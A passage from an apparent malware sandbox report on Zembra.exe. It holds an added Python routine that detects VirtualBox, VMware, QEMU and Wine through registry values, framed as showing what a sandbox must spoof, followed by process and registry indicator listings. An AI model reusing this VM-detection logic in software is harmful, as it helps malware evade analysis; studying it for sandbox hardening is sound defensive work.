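Taken together, the BIOS, Wine and processor signatures above describe one evasion routine in Zembra.exe: read a handful of registry values and bail out if they name a hypervisor or emulator. The example below is added here and is neither the sample's code nor the sandbox's; it evaluates the same four registry locations against the marker strings such checks commonly use, on constructed registry snapshots (one modelled on an unmodified VirtualBox guest, one with the values spoofed, one with a Wine key present). It shows which values a sandbox has to patch for this sample to run at all.

```python
"""Evaluate the registry values the report shows Zembra.exe reading
against hypervisor/emulator marker strings.

Added example; not the sample's or the sandbox's code. Snapshots are
constructed; the VirtualBox values are modelled on that product's defaults.
"""
from typing import Dict, List, Optional, Sequence, Union

RegValue = Union[str, Sequence[str], None]   # REG_SZ, REG_MULTI_SZ, or key present with no value

# The locations from the report, as the malware would open them.
SYSTEM_BIOS = r"HKLM\HARDWARE\DESCRIPTION\System\SystemBiosVersion"
VIDEO_BIOS  = r"HKLM\HARDWARE\DESCRIPTION\System\VideoBiosVersion"
CPU_NAME    = r"HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString"
WINE_KEY    = r"HKCU\Software\Wine"

# Case-insensitive substrings that give away a virtual machine or emulator.
HYPERVISOR_MARKERS = ("vbox", "virtualbox", "vmware", "qemu", "bochs",
                      "xen", "parallels", "hyper-v", "virtual")


def _contains_marker(value: RegValue) -> Optional[str]:
    """First marker found in a REG_SZ or REG_MULTI_SZ value, else None."""
    if value is None:
        return None
    parts = [value] if isinstance(value, str) else list(value)
    for part in parts:
        low = part.lower()
        for marker in HYPERVISOR_MARKERS:
            if marker in low:
                return marker
    return None


def sandbox_indicators(registry: Dict[str, RegValue]) -> List[str]:
    """Return the checks that would trip, in the order the report lists them.
    `registry` maps a key/value path to its data; a key present with no
    interesting data (like Software\\Wine) is stored as None."""
    findings: List[str] = []
    for label, path in (("SystemBiosVersion", SYSTEM_BIOS),
                        ("VideoBiosVersion", VIDEO_BIOS),
                        ("ProcessorNameString", CPU_NAME)):
        marker = _contains_marker(registry.get(path))
        if marker:
            findings.append(f"{label} contains '{marker}'")
    if WINE_KEY in registry:
        findings.append("HKCU\\Software\\Wine key exists (Wine)")
    return findings


# Constructed snapshots. VirtualBox exposes its own SMBIOS and VESA BIOS
# strings but passes the host CPU's name through, which is why the CPU
# check alone is not enough to spot it.
STOCK_VBOX_GUEST: Dict[str, RegValue] = {
    SYSTEM_BIOS: ["VBOX   - 1"],
    VIDEO_BIOS:  ["Oracle VM VirtualBox VESA BIOS"],
    CPU_NAME:    "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz",
}
SPOOFED_GUEST: Dict[str, RegValue] = {      # same VM after patching the values
    SYSTEM_BIOS: ["DELL   - 1072009"],
    VIDEO_BIOS:  ["Intel Video BIOS"],
    CPU_NAME:    "Intel(R) Core(TM) i7-8700 CPU @ 3.20GHz",
}
WINE_HOST: Dict[str, RegValue] = {          # Windows binary running under Wine
    CPU_NAME: "AMD Ryzen 5 3600 6-Core Processor",
    WINE_KEY: None,
}

if __name__ == "__main__":
    for name, snap in (("stock VirtualBox", STOCK_VBOX_GUEST),
                       ("spoofed", SPOOFED_GUEST), ("Wine", WINE_HOST)):
        print(f"{name}: {sandbox_indicators(snap) or 'no indicators'}")
```

On the stock VirtualBox snapshot two of the three value checks trip; on the spoofed snapshot none do, which is the state a detonation sandbox needs to reach before a sample like this will unpack its payloads. The Wine check is a key-existence test, so spoofing values does not help there; the key has to be absent. This report's "Identifies VirtualBox via ACPI registry values" signature points at a further location (ACPI tables under HKLM\HARDWARE) that the same approach would have to cover.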
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe (8 instances)
pid | process
6732 | schtasks.exe
10256 | schtasks.exe
8096 | schtasks.exe
7568 | schtasks.exe
1336 | schtasks.exe
7324 | schtasks.exe
6456 | schtasks.exe
5664 | schtasks.exe
Delays execution with timeout.exe 2 IoCs
Processes: timeout.exe (2 instances)
pid | process
3764 | timeout.exe
6160 | timeout.exe
Kills process with taskkill 17 IoCs
Processes: taskkill.exe (17 instances)
pid | process
3052 | taskkill.exe
5820 | taskkill.exe
7200 | taskkill.exe
6344 | taskkill.exe
5776 | taskkill.exe
13216 | taskkill.exe
6844 | taskkill.exe
8096 | taskkill.exe
2472 | taskkill.exe
7004 | taskkill.exe
992 | taskkill.exe
10056 | taskkill.exe
8328 | taskkill.exe
12752 | taskkill.exe
16212 | taskkill.exe
1904 | taskkill.exe
6468 | taskkill.exe
Modifies data under HKEY_USERS 64 IoCs
Processes: DrvInst.exe, mask_svc.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2432 = "Cuba Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-51 = "Greenland Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2161 = "Altai Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-352 = "FLE Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-364 = "Middle East Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-511 = "Central Asia Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2431 = "Cuba Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2511 = "Lord Howe Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2061 = "North Korea Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | DrvInst.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | DrvInst.exe
Modifies registry class 48 IoCs
Processes: MicrosoftEdge.exe, Software-update-patc_579570356.sfx.exe, Exercitationem.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = eda47e9320aed701 | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | Software-update-patc_579570356.sfx.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | Software-update-patc_579570356.sfx.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = eda47e9320aed701 | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | MicrosoftEdge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | MicrosoftEdge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings | Exercitationem.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings | MicrosoftEdge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = eda47e9320aed701 | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content | MicrosoftEdge.exe
Processes:
